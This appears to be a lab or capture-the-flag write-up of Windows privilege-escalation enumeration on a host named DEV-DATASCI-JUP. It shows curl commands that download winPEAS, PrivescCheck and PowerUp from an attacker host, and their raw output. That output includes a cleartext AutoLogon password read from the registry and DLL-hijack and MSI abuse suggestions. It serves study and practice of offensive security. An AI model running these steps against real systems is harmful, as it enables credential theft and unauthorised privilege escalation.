PEAS


Conducting an automated enumeration after performing a manual enumeration on the DEV-DATASCI-JUP(10.10.232.68) host.

PS C:\tmp> curl http://10.9.0.130/winPEASany.exe -OutFile .\winPEASany.exe

Delivery complete

Executing PEAS

ENV


+----------¦ User Environment Variables
+ Check for some passwords or keys in the env variables 
    SystemDrive: C: 
    ProgramFiles(x86): C:\Program Files (x86)
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\Syst
em32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\dev-datasci-lowpriv\AppData\Local\Pr
ograms\Python\Python310\Scripts\;C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\;C:\Users\dev-datasci-lowpriv\AppD
ata\Local\Microsoft\WindowsApps;
    ProgramW6432: C:\Program Files
    PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
    TMP: C:\Users\dev-datasci-lowpriv\AppData\Local\Temp
    PROCESSOR_ARCHITECTURE: AMD64
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PROCESSOR_REVISION: 0102
    TEMP: C:\Users\dev-datasci-lowpriv\AppData\Local\Temp
    USERPROFILE: C:\Users\dev-datasci-lowpriv
    USER: dev-datasci-lowpriv
    TERM: xterm-256color
    USERNAME: dev-datasci-lowpriv
    SystemRoot: C:\Windows
    CommonProgramFiles: C:\Program Files\Common Files
    LOGNAME: dev-datasci-lowpriv
    ProgramData: C:\ProgramData
    HOMEPATH: \Users\dev-datasci-lowpriv
    COMPUTERNAME: DEV-DATASCI-JUP
    ALLUSERSPROFILE: C:\ProgramData
    SSH_CONNECTION: 10.9.0.130 53840 10.10.62.163 22
    SHELL: c:\windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData 
    HOMEDRIVE: C:
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    OS: Windows_NT
    ProgramFiles: C:\Program Files
    ComSpec: C:\Windows\system32\cmd.exe
    HOME: C:\Users\dev-datasci-lowpriv
    PSModulePath: C:\Users\dev-datasci-lowpriv\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules
;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROMPT: dev-datasci-lowpriv@DEV-DATASCI-JUP $P$G
    SSH_CLIENT: 10.9.0.130 53840 22
    APPDATA: C:\Users\dev-datasci-lowpriv\AppData\Roaming
    USERDOMAIN: WORKGROUP
    PROCESSOR_LEVEL: 23
    LOCALAPPDATA: C:\Users\dev-datasci-lowpriv\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    SSH_TTY: windows-pty
    PSExecutionPolicyPreference: Bypass
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    PUBLIC: C:\Users\Public
 
+----------¦ System Environment Variables
+ Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe 
    DriverData: C:\Windows\System32\Drivers\DriverData 
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\Syst
em32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 23
    PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
    PROCESSOR_REVISION: 0102

N/A


UAC


PowerShell


C:\Users\dev-datasci-lowpriv\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

AlwaysInstallElevated


misexec.exe fails to execute(install)

NTLM


AutoLogon


PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1 
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    DEV-DATASCI-JUP
    DefaultUserName    REG_SZ    dev-datasci-lowpriv
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0 
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x1fbdf5bb45
    ShutdownFlags    REG_DWORD    0x8000022b
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    wUqnKWqzha*W!PWrPRWi!M8faUn
    AutoLogonSID    REG_SZ    S-1-5-21-2336295375-1619315875-398172279-1000
    LastUsedUsername    REG_SZ    dev-datasci-lowpriv
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

dev-datasci-lowpriv:wUqnKWqzha*W!PWrPRWi!M8faUn

PrivescCheck


PS C:\tmp> curl http://10.9.0.130/PrivescCheck.ps1 -OutFile .\PrivescCheck.ps1

Delivery complete

PS C:\tmp> . .\PrivescCheck.ps1
PS C:\tmp> Invoke-PrivescCheck

Executing PrivescCheck

Token Privileges (dev-datasci-lowpriv)


Enumerated

Services


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service list (non-default)                        ┃
┃ TYPE     ┃ Base                                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 
 
Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : GoogleChromeElevationService
DisplayName : Google Chrome Elevation Service (GoogleChromeElevationService)
ImagePath   : "C:\Program Files\Google\Chrome\Application\111.0.5563.65\elevation_service.exe"
User        : LocalSystem
StartMode   : Manual
 
Name        : gupdate
DisplayName : Google Update Service (gupdate)
ImagePath   : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User        : LocalSystem
StartMode   : Automatic
 
Name        : gupdatem
DisplayName : Google Update Service (gupdatem)
ImagePath   : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
User        : LocalSystem
StartMode   : Manual
 
Name        : PsShutdownSvc
DisplayName : PsShutdown
ImagePath   : C:\Windows\PSSDNSVC.EXE
User        : LocalSystem
StartMode   : Manual
 
Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled
 
Name        : sshd
DisplayName : OpenSSH SSH Server
ImagePath   : C:\Windows\System32\OpenSSH\sshd.exe
User        : LocalSystem
StartMode   : Automatic
 
Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : vm3dservice
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic
 
Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic
 
 
 
[*] Status: Informational - Severity: None - Execution time: 00:00:03.357

WinLogon


AutoLogon

MSI Installation Policy


AlwaysInstallElevated misexec.exe fails to execute(install)

PowerUp


PS C:\tmp> curl http://10.9.0.130/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
Get-WmiObject : Access denied  
 
ModifiablePath    : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\Scripts\
IdentityReference : DEV-DATASCI-JUP\dev-datasci-lowpriv
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\Scripts\
Name              : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\Scripts\
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath
                    'C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\Scripts\\wlbsctrl.dll'
 
ModifiablePath    : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\
IdentityReference : DEV-DATASCI-JUP\dev-datasci-lowpriv
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\
Name              : C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\dev-datasci-lowpriv\AppData\Local\Programs\Python\Python310\\wlbsctrl.dll'       
 
ModifiablePath    : C:\Users\dev-datasci-lowpriv\AppData\Local\Microsoft\WindowsApps
IdentityReference : DEV-DATASCI-JUP\dev-datasci-lowpriv
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\dev-datasci-lowpriv\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\dev-datasci-lowpriv\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\dev-datasci-lowpriv\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
Check         : AlwaysInstallElevated Registry Key 
AbuseFunction : Write-UserAddMSI
 
DefaultDomainName    : DEV-DATASCI-JUP 
DefaultUserName      : dev-datasci-lowpriv
DefaultPassword      : wUqnKWqzha*W!PWrPRWi!M8faUn
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons